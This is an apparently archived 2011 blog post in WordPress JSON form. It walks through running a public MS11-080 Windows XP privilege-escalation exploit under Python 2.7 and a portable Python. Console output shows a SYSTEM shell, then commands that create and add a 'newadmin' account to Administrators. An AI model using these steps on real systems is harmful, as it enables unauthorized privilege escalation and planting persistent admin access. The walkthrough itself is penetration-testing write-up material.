{"id":280,"date":"2011-12-19T18:25:25","date_gmt":"2011-12-19T17:25:25","guid":{"rendered":"https:\/\/www.phillips321.co.uk\/?p=280"},"modified":"2011-12-19T18:29:08","modified_gmt":"2011-12-19T17:29:08","slug":"ms11-080-priv-escalation","status":"publish","type":"post","link":"https:\/\/www.phillips321.co.uk\/2011\/12\/19\/ms11-080-priv-escalation\/","title":{"rendered":"MS11-080 priv escalation"},"content":{"rendered":"

So you’ve got access to a box but it’s only as a local user and you want SYSTEM like most people, step in 18176.py<\/a>. As this code was written in python you’ll need a local copy of python on the box in order to priv up.<\/p>\n

1
2
3
4
5
6
7
<\/div><\/td>
C:\\Documents and Settings\\user\\Desktop><\/span>18176<\/span>.py
\nUsage: 18176<\/span>.py -O<\/span> TARGET_OS
\nOptions:
\n  -h, --help<\/span>            show this help<\/span> message and exit<\/span>
\n  -O<\/span> TARGET_OS, --target-os<\/span>=TARGET_OS
\n                        Target OS. Accepted values: XP, 2K3
\nC:\\Documents and Settings\\user\\Desktop><\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n

My first attempt was with python version 3.2.2. and for some reason the code kept failing.<\/p>\n

1
2
3
4
5
6
<\/div><\/td>
C:\\Documents and Settings\\user\\Desktop><\/span>18176<\/span>.py
\n  File "C:\\Documents and Settings\\Administrator\\Desktop\\18176.py"<\/span>, line 56<\/span>
\n    print "[+] Retrieving %s info..."<\/span> %<\/span> drvname
\n                                    ^
\nSyntaxError: invalid syntax
\nC:\\Documents and Settings\\user\\Desktop><\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n

Python version 2.7 seemed to work just fine \ud83d\ude42<\/p>\n

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<\/div><\/td>
C:\\Documents and Settings\\user\\Desktop><\/span>net user newadmin \/<\/span>add
\nSystem error 5<\/span> has occurred.
\nAccess is denied.
\nC:\\Documents and Settings\\user\\Desktop><\/span>18176<\/span>.py -O<\/span> XP
\n[<\/span>><\/span>]<\/span> MS11-080 Privilege Escalation Exploit
\n[<\/span>><\/span>]<\/span> Matteo Memelli - ryujin@<\/span>offsec.com
\n[<\/span>><\/span>]<\/span> Release Date 28<\/span>\/<\/span>11<\/span>\/<\/span>2011<\/span>
\n[<\/span>+]<\/span> Retrieving Kernel info...
\n[<\/span>+]<\/span> Kernel version: ntkrnlpa.exe
\n[<\/span>+]<\/span> Kernel base address: 0x804d7000L
\n[<\/span>+]<\/span> HalDispatchTable address: 0x8054d038L
\n[<\/span>+]<\/span> Retrieving hal.dll info...
\n[<\/span>+]<\/span> hal.dll base address: 0x806e5000L
\n[<\/span>+]<\/span> HaliQuerySystemInformation address: 0x806fbbbaL
\n[<\/span>+]<\/span> HalpSetSystemInformation address: 0x806fe436L
\n[<\/span>*<\/span>]<\/span> Triggering AFDJoinLeaf pointer overwrite...
\n[<\/span>*<\/span>]<\/span> Spawning a SYSTEM shell...
\nC:\\WINDOWS\\system32><\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n

And now for the quick new user \ud83d\ude42<\/p>\n

1
2
3
4
5
6
7
8
9
10
11
12
<\/div><\/td>
C:\\WINDOWS\\system32><\/span>net user newadmin Secret01 \/<\/span>add
\nThe command<\/span> completed successfully.
\nC:\\WINDOWS\\system32><\/span>net localgroup Administrators newadmin \/<\/span>add
\nThe command<\/span> completed successfully.
\nC:\\WINDOWS\\system32><\/span>net user
\nUser accounts for<\/span> \\\\
\n------------------------------------------------------------------<\/span>
\nAdministrator            ASPNET                   Guest
\nHelpAssistant            newadmin                 SUPPORT_388945a0
\nuser
\nThe command<\/span> completed with one or more<\/span> errors.
\nC:\\WINDOWS\\system32><\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n

I got thinking, yeah I could attempt to rewrite this exploit in another language but that’s way past my skill level and available time. So what about a portable version of python? Step in PortablePython<\/a>! The download is 45MB and once extracted it’s 222MB. Then it’s just a simple case of pointing the python.exe at the code \ud83d\ude42<\/p>\n

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<\/div><\/td>
C:\\Documents and Settings\\user\\Desktop><\/span>PortablePy\\App\\python.exe 18176<\/span>.py -O<\/span> XP
\n[<\/span>><\/span>]<\/span> MS11-080 Privilege Escalation Exploit
\n[<\/span>><\/span>]<\/span> Matteo Memelli - ryujin@<\/span>offsec.com
\n[<\/span>><\/span>]<\/span> Release Date 28<\/span>\/<\/span>11<\/span>\/<\/span>2011<\/span>
\n[<\/span>+]<\/span> Retrieving Kernel info...
\n[<\/span>+]<\/span> Kernel version: ntkrnlpa.exe
\n[<\/span>+]<\/span> Kernel base address: 0x804d7000L
\n[<\/span>+]<\/span> HalDispatchTable address: 0x8054d038L
\n[<\/span>+]<\/span> Retrieving hal.dll info...
\n[<\/span>+]<\/span> hal.dll base address: 0x806e5000L
\n[<\/span>+]<\/span> HaliQuerySystemInformation address: 0x806fbbbaL
\n[<\/span>+]<\/span> HalpSetSystemInformation address: 0x806fe436L
\n[<\/span>*<\/span>]<\/span> Triggering AFDJoinLeaf pointer overwrite...
\n[<\/span>*<\/span>]<\/span> Spawning a SYSTEM shell...
\nC:\\WINDOWS\\system32><\/span>net user newuser Secret01 \/<\/span>add
\nThe command<\/span> completed successfully.
\nC:\\WINDOWS\\system32><\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n

It would be nice to see how much I could strip out of the portable version in order to decrease it’s size, but then that’s just something else for a rainy day.<\/p>\n

How long before this is written in powershell or added to meterpreter’s getsystem code?<\/p>\n","protected":false},"excerpt":{"rendered":"

So you’ve got access to a box but it’s only as a local user and you want SYSTEM like most people, step in 18176.py. As this code was written in python you’ll need a local copy of python on the box in order to priv up. 1234567C:\\Documents and Settings\\user\\Desktop>18176.py Usage: 18176.py -O TARGET_OS Options:   […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[109,108,112,110,111,113],"_links":{"self":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/280"}],"collection":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/comments?post=280"}],"version-history":[{"count":8,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/280\/revisions"}],"predecessor-version":[{"id":288,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/280\/revisions\/288"}],"wp:attachment":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/media?parent=280"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/categories?post=280"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/tags?post=280"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}